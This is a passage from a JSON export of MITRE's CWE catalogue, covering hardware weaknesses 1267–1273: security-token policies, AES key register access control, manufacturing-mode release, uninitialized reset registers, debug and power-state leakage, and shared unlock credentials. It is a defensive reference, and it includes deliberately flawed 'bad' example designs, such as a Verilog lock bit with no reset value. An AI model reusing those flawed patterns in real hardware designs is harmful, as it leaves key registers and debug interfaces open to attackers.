(Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Reduce Reliability"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":["Security Token Decoders should be reviewed for design inconsistency and common weaknesses.","Access and programming flows should be tested in both pre-silicon and post-silicon testing."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["For example, consider a system that has four bus masters. The table below provides bus masters, their Security Tokens, and trust assumptions.","The policy encoding is to be defined such that Security Token will be used in implemented access-controls. The bits in the bus transaction that contain Security-Token information are Bus_transaction [15:11]. The assets are the AES-Key registers for encryption or decryption. The key of 128 bits is implemented as a set of four, 32-bit registers.","Below is an example of a policy encoding scheme inherited from a previous project where all \\"ODD\\" numbered Security Tokens are trusted."],"xhtml:table":[{"xhtml:tr":[{"xhtml:th":["Bus Master","Security Token Decoding","Trust Assumptions"]},{"xhtml:td":["Master_0","\\"00\\"","Untrusted"]},{"xhtml:td":["Master_1","\\"01\\"","Trusted"]},{"xhtml:td":["Master_2","\\"10\\"","Untrusted"]},{"xhtml:td":["Master_3","\\"11\\"","Untrusted"]}]},{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_4","AES key [96:127] for encryption or decryption, Default 0x00000000"]}]}]},"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":[{"#text":"If (Bus_transaction[14] == \\"1\\")Else","xhtml:div":[{"#text":"Trusted = \\"1\\"","attr":{"@_style":"margin-left:10px"}},{"#text":"Trusted = \\"0\\"","attr":{"@_style":"margin-left:10px"}}]},{"#text":"If (trusted)Else","xhtml:div":[{"#text":"Allow access to AES-Key registers","attr":{"@_style":"margin-left:10px"}},{"#text":"Deny access to AES-Key registers","attr":{"@_style":"margin-left:10px"}}]}]},{"attr":{"@_Nature":"good"},"xhtml:div":["Security_Token[4:0] = Bus_transaction[15:11]",{"#text":"If (AES_KEY_ACCESS_POLICY[Security_Token] == \\"1\\")Else","xhtml:div":[{"#text":"Allow access to AES-Key registers","attr":{"@_style":"margin-left:10px;"}},{"#text":"Deny access to AES-Key registers","attr":{"@_style":"margin-left:10px;"}}]}]}],"Body_Text":[{"xhtml:p":"The inherited policy encoding is obsolete and does not work for the new system where an untrusted bus master with an odd Security Token exists in the system, i.e., Master_3 whose Security Token is \\"11\\". Based on the old policy, the untrusted bus master (Master_3) has access to the AES-Key registers. To resolve this, a register AES_KEY_ACCESS_POLICY can be defined to provide necessary, access controls:"},{"xhtml:p":["New Policy:","The AES_KEY_ACCESS_POLICY register defines which agents with a Security Token in the transaction can access the AES-key registers. Each bit in this 32-bit register defines a Security Token. There could be a maximum of 32 security Tokens that are allowed access to the AES-key registers. The number of the bit when set (i.e., \\"1\\") allows respective action from an agent whose identity matches the number of the bit and, if \\"0\\" (i.e., Clear), disallows the respective action to that corresponding agent. Thus, any bus master with Security Token \\"01\\" is allowed access to the AES-Key registers. Below is the Pseudo Code for policy encoding:"],"xhtml:table":{"xhtml:tr":{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:0] Default 0x00000002 \u2013 agent with Security Token \\"1\\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1093"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-18"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1268":{"attr":{"@_ID":"1268","@_Name":"Policy Privileges are not Assigned Consistently Between Control and Data Agents","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product\'s hardware-enforced access control for a particular resource improperly accounts for privilege discrepancies between control and write policies.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware engines may provide access to resources (device-configuration, encryption keys, etc.) belonging to trusted firmware or software modules (commonly set by a BIOS or a bootloader). These accesses are typically controlled and limited by the hardware. Hardware design access control is sometimes implemented using a policy. A policy defines which entity or agent may or may not be allowed to perform an action. When a system implements multiple levels of policies, a control policy may allow direct access to a resource as well as changes to the policies themselves.","Resources that include agents in their control policy but not in their write policy could unintentionally allow an untrusted agent to insert itself in the write policy register. Inclusion in the write policy register could allow a malicious or misbehaving agent write access to resources. This action could result in security compromises including leaked information, leaked encryption keys, or modification of device configuration."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness may be introduced during the design of a device when the architect does not comprehensively specify all of the policies required by an agent."},{"Phase":"Implementation","Note":"This weakness may be introduced during implementation if device policy restrictions do not sufficiently constrain less-privileged clients."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Files or Directories","Reduce Reliability"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Access-control-policy definition and programming flow must be sufficiently tested in pre-silicon and post-silicon testing."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a system with a register for storing an AES key for encryption or decryption. The key is composed of 128 bits implemented as a set of four 32-bit registers. The key registers are resources and registers, AES_KEY_CONTROL_POLICY, AES_KEY_READ_POLICY and AES_KEY_WRITE_POLICY, and are defined to provide necessary, access controls.","The control-policy register defines which agents can write to the read-policy and write-policy registers. The read-policy register defines which agents can read the AES-key registers, and write-policy register defines which agents can program or write to those registers. Each 32-bit register can support access control for a maximum of 32 agents. The number of the bit when set (i.e., \\"1\\") allows respective action from an agent whose identity matches the number of the bit and, if \\"0\\" (i.e., Clear), disallows the respective action to that corresponding agent."]},"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0",{"#text":"AES key [0:31] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_1",{"#text":"AES key [32:63] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_2",{"#text":"AES key [64:95] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_3",{"#text":"AES key [96:127] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_KEY_CONTROL_POLICY","[31:0] Default 0x00000018, meaning agent with identities \\"4\\" and \\"3\\" has read/write access to this register (i.e., AES_KEY_CONTROL_POLICY), AES_KEY_READ_POLICY, and AES_KEY_WRITE_POLICY registers"]},{"xhtml:td":["AES_KEY_READ_POLICY","[31:0] Default 0x00000002, agent with identity \\"1\\" can only read AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers"]},{"xhtml:td":["AES_KEY_WRITE_POLICY","[31:0] Default 0x00000004, agent with identity \\"2\\" can only write to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers"]}]}},{"attr":{"@_Nature":"good"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_KEY_CONTROL_POLICY","[31:0] Default 0x00000010, meaning only agents with an identity of \\"4\\" have read/write access to this register (i.e., AES_KEY_CONTROL_POLICY), AES_KEY_READ_POLICY, and AES_KEY_WRITE_POLICY registers"]},{"xhtml:td":["AES_KEY_READ_POLICY","[31:0] Default 0x00000002, meaning only trusted firmware with an identity of \\"1\\" can program registers: \\nAES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3"]},{"xhtml:td":["AES_KEY_WRITE_POLICY","[31:0] Default 0x00000004, meaning only trusted firmware with an identity of \\"2\\" can program registers: \\nAES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3"]}]}}],"Body_Text":{"xhtml:p":["In the above example, the AES_KEY_CONTROL_POLICY register has agents with identities \\"4\\"and \\"3\\" in its policy. Assuming the agent with identity \\"4\\" is trusted and the agent with identity \\"3\\" is untrusted. The untrusted agent \\"3\\" can write to AES_KEY_WRITE_POLICY with a value of 0x0000000C thus allowing write access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers.","For the above example, the control, read-and-write-policy registers\u2019 values are defined as below."],"xhtml:ol":{"xhtml:li":["The AES_KEY_CONTROL_POLICY defines which agents have write access to the AES_KEY_CONTROL_POLICY, AES_KEY_READ_POLICY, and the AES_KEY_WRITE_POLICY registers,","The AES-key registers can only be read or used by a crypto agent with identity \\"1\\" when bit #1 is set.","The AES-key registers can only be programmed by a trusted firmware with identity \\"2\\" when bit #2 is set."]}}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns"},"Previous_Entry_Name":{"#text":"Agents Included in Control Policy are not Contained in Less-Privileged Policy","attr":{"@_Date":"2020-08-20"}}}},"1269":{"attr":{"@_ID":"1269","@_Name":"Product Released in Non-Release Configuration","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product released to market is released in pre-production or manufacturing configuration.","Extended_Description":{"xhtml:p":["Products in the pre-production or manufacturing stages are configured to have many debug hooks and debug capabilities, including but not limited to:","The above is by no means an exhaustive list, but it alludes to the greater capability and the greater state of vulnerability of a product during it\'s preproduction or manufacturing state.","Complexity increases when multiple parties are involved in executing the tests before the final production version. For example, a chipmaker might fabricate a chip and run its own preproduction tests, following which the chip would be delivered to the Original Equipment Manufacturer (OEM), who would now run a second set of different preproduction tests on the same chip. Only after both of these sets of activities are complete, can the overall manufacturing phase be called \u201ccomplete\u201d and have the \u201cManufacturing Complete\u201d fuse blown. However, if the OEM forgets to blow the Manufacturing Complete fuse, then the system remains in the manufacturing stage, rendering the system both exposed and vulnerable."],"xhtml:ul":{"xhtml:li":["Ability to override/bypass various cryptographic checks (including authentication, authorization, and integrity)","Ability to read/write/modify/dump internal state (including registers and memory)","Ability to change system configurations","Ability to run hidden or private commands that are not allowed during production (as they expose IP)."]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Compiled","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Integration"},{"Phase":"Manufacturing"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Other","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown)."},{"Phase":"Integration","Description":"Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown)."},{"Phase":"Manufacturing","Description":"Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown)."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example shows what happens when a preproduction system is made available for production.","Example_Code":[{"#text":"Suppose the chipmaker has a way of scanning all the internal memory (containing chipmaker-level secrets) during the manufacturing phase, and the way the chipmaker or the Original Equipment Manufacturer (OEM) marks the end of the manufacturing phase is by blowing a Manufacturing Complete fuse. Now, suppose that whoever blows the Manufacturing Complete fuse inadvertently forgets to execute the step to blow the fuse.","attr":{"@_Nature":"bad"}},{"#text":"Blow the Manufacturing Complete fuse.","attr":{"@_Nature":"good"}}],"Body_Text":"An attacker will now be able to scan all the internal memory (containing chipmaker-level secrets)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-13945","Description":"Regarding SSA-686531, a hardware based manufacturing access on S7-1200 and\\nS7-200 SMART has occurred. A vulnerability has been identified in SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions), SIMATIC S7-200 SMART CPU family (All versions). There is an access mode used during manufacturing of S7-1200 CPUs that allows additional diagnostic functionality. The security vulnerability could be exploited by an attacker with physical access to the UART interface during boot process. At the time of advisory publication, no public exploitation of this security vulnerability was known.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13945"},{"Reference":"CVE-2018-4251","Description":"Laptops with Intel chipsets were found to be running in Manufacturing Mode. After this information was reported to the OEM, the vulnerability (CVE-2018-4251) was patched disallowing access to the interface.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4251"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"439"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1103"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-31"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Related_Attack_Patterns"}}},"1270":{"attr":{"@_ID":"1270","@_Name":"Generation of Incorrect Security Tokens","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens generated in the system are incorrect.","Extended_Description":{"xhtml:p":"Systems-On-a-Chip (SoC) (Integrated circuits and hardware engines) implement Security Tokens to differentiate and identify actions originated from various agents. These actions could be \\"read\\", \\"write\\", \\"program\\", \\"reset\\", \\"fetch\\", \\"compute\\", etc. Security Tokens are generated and assigned to every agent on the SoC that is either capable of generating an action or receiving an action from another agent. Every agent could be assigned a unique, Security Token based on its trust level or privileges. Incorrectly generated Security Tokens could result in the same token used for multiple agents or multiple tokens being used for the same agent. This condition could result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Files or Directories","Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Gain Privileges or Assume Identity","Read Memory","Modify Memory","DoS: Crash, Exit, or Restart"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:ul":{"xhtml:li":["Generation of Security Tokens should be reviewed for design inconsistency and common weaknesses.","Security-Token definition and programming flow should be tested in pre-silicon and post-silicon testing."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a system with a register for storing an AES key for encryption or decryption. The key is 128 bits long implemented as a set of four 32-bit registers. The key registers are assets, and register, AES_KEY_ACCESS_POLICY, is defined to provide necessary access controls. The access-policy register defines which agents, using a Security Token, may access the AES-key registers. Each bit in this 32-bit register is used to define a Security Token. There could be a maximum of 32 Security Tokens that are allowed access to the AES-key registers. When set (bit = \\"1\\") bit number allows action from an agent whose identity matches that bit number. If Clear (bit = \\"0\\") the action is disallowed for the corresponding agent.","Body_Text":[{"#text":"Let\\"s assume the system has two agents: a Main-controller and an Aux-controller. The respective Security Tokens are \\"1\\" and \\"2\\".","xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Description","Default"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_3","AES key [96:127] for encryption or decryption",0]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","AES key access register [31:0]",2]}]}},"An agent with a Security Token \\"1\\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. As per the above access policy, the AES-Key-access policy allows access to the AES-key registers if the security Token is \\"1\\".","Both agents have access to the AES-key registers."],"Example_Code":[{"#text":"The SoC incorrectly generates Security Token \\"1\\" for every agent. In other words, both Main-controller and Aux-controller are assigned Security Token \\"1\\".","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The SoC should correctly generate Security Tokens, assigning \\"1\\" to the Main-controller and \\"2\\" to the Aux-controller","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"633"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-03-06"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Generation of Incorrect Security Identifiers","attr":{"@_Date":"2020-08-20"}}}},"1271":{"attr":{"@_ID":"1271","@_Name":"Uninitialized Value on Reset for Registers Holding Security Settings","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Security-critical logic is not set to a known value on reset.","Extended_Description":{"xhtml:p":"When the device is first brought out of reset, the state of registers will be indeterminate if they have not been initialized by the logic. Before the registers are initialized, there will be a window during which the device is in an insecure state and may be vulnerable to attack."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Authentication","Authorization"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Design checks should be performed to identify any uninitialized flip-flops used for security-critical functions."},{"Phase":"Architecture and Design","Description":"All registers holding security-critical information should be set to a specific value on reset."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Shown below is a positive clock edge triggered flip-flop used to implement a lock bit for test and debug interface. When the circuit is first brought out of reset, the state of the flip-flop will be unknown until the enable input and D-input signals update the flip-flop state. In this example, an attacker can reset the device until the test and debug interface is unlocked and access the test interface until the lock signal is driven to a known state by the logic.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"always @(posedge clk) beginend","xhtml:div":{"#text":"if (en) lock_jtag <= d;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:div":{"#text":"always @(posedge clk) beginend","xhtml:div":[{"#text":"if (~reset) lock_jtag <= 0;","attr":{"@_style":"margin-left:10px;"}},{"#text":"else if (en) lock_jtag <= d;","attr":{"@_style":"margin-left:10px;"}}]}}],"Body_Text":"The flip-flop can be set to a known value (0 or 1) on reset, but requires that the logic explicitly update the output of the flip-flop if the reset signal is active."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"74"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Name, Type"}],"Previous_Entry_Name":[{"#text":"Missing Known Value on Reset for Registers Holding Security Settings","attr":{"@_Date":"2020-08-20"}},{"#text":"Unitialized Value on Reset for Registers Holding Security Settings","attr":{"@_Date":"2021-03-15"}}]}},"1272":{"attr":{"@_ID":"1272","@_Name":"Sensitive Information Uncleared Before Debug/Power State Transition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product performs a power or debug state transition, but it does not clear sensitive information that should no longer be accessible due to changes to information access restrictions.","Extended_Description":{"xhtml:p":"A device or system frequently employs many power and sleep states during its normal operation (e.g., normal power, additional power, low power, hibernate, deep sleep, etc.). A device also may be operating within a debug condition. State transitions can happen from one power or debug state to another. If there is information available in the previous state which should not be available in the next state and is not properly removed before the transition into the next state, sensitive information may leak from the system."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Compiled","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":["Read Memory","Read Application Data"],"Likelihood":"High","Note":"Sensitive information may be used to unlock additional capabilities of the device and take advantage of hidden functionalities which could be used to compromise device security."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Write a known pattern into each sensitive location. Enter the power/debug state in question. Read data back from the sensitive locations. If the reads are successful, and the data is the same as the pattern that was originally written, the test fails and the device needs to be fixed. Note that this test can likely be automated.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"During state transitions, information not needed in the next state should be removed before the transition to the next state."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-147"},"Intro_Text":"This example shows how an attacker can take advantage of an incorrect state transition.","Body_Text":[{"xhtml:p":"Suppose a device is transitioning from state A to state B. During state A, it can read certain private keys from the hidden fuses that are only accessible in state A but not in state B. The device reads the keys, performs operations using those keys, then transitions to state B, where those private keys should no longer be accessible."},{"xhtml:p":"After the transition to state B, even though the private keys are no longer accessible directly from the fuses in state B, they can be accessed indirectly by reading the memory that contains the private keys."}],"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:p":"During the transition from A to B, the device does not scrub the memory."},{"#text":"For transition from state A to state B, remove information which should not be available once the transition is complete.","attr":{"@_Nature":"good"}}]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2020-12926","Description":"Product software does not set a flag as per TPM specifications, thereby preventing a failed authorization attempt from being recorded after a loss of power.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12926"}},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}},{"attr":{"@_CAPEC_ID":"546"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1220"}}},"Content_History":{"Submission":{"Submission_Name":"Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-31"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas"}],"Previous_Entry_Name":{"#text":"Debug/Power State Transitions Leak Information","attr":{"@_Date":"2020-08-20"}}}},"1273":{"attr":{"@_ID":"1273","@_Name":"Device Unlock Credential Sharing","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The credentials necessary for unlocking a device are shared across multiple parties and may expose sensitive information.","Extended_Description":{"xhtml:p":"\u201cUnlocking a device\u201d often means activating certain, unadvertised, debug and manufacturer-specific capabilities of a device using sensitive credentials. Unlocking a device might be necessary for the purpose of troubleshooting device problems. For example, suppose a device contains the ability to dump the content of the full system memory by disabling the memory-protection mechanisms. Since this is a highly security-sensitive capability, this capability is \u201clocked\u201d in the production part. Unless the device gets unlocked by supplying the proper credentials the debug capabilities are not available. For cases where the chip designer, chip manufacturer (fabricator), and manufacturing and assembly testers are the all employed by the same company, the compromise of the credentials are greatly reduced. However, when the chip designer is employed by one company, the chip manufacturer is employed by another company (a foundry), and the assemblers and testers are employed by yet a third company. Since these different companies will need to perform various tests on the device to verify correct device function, they all need to share the unlock key. Unfortunately, the level of secrecy and policy might be quite different at each company, greatly increasing the risk of sensitive credentials being 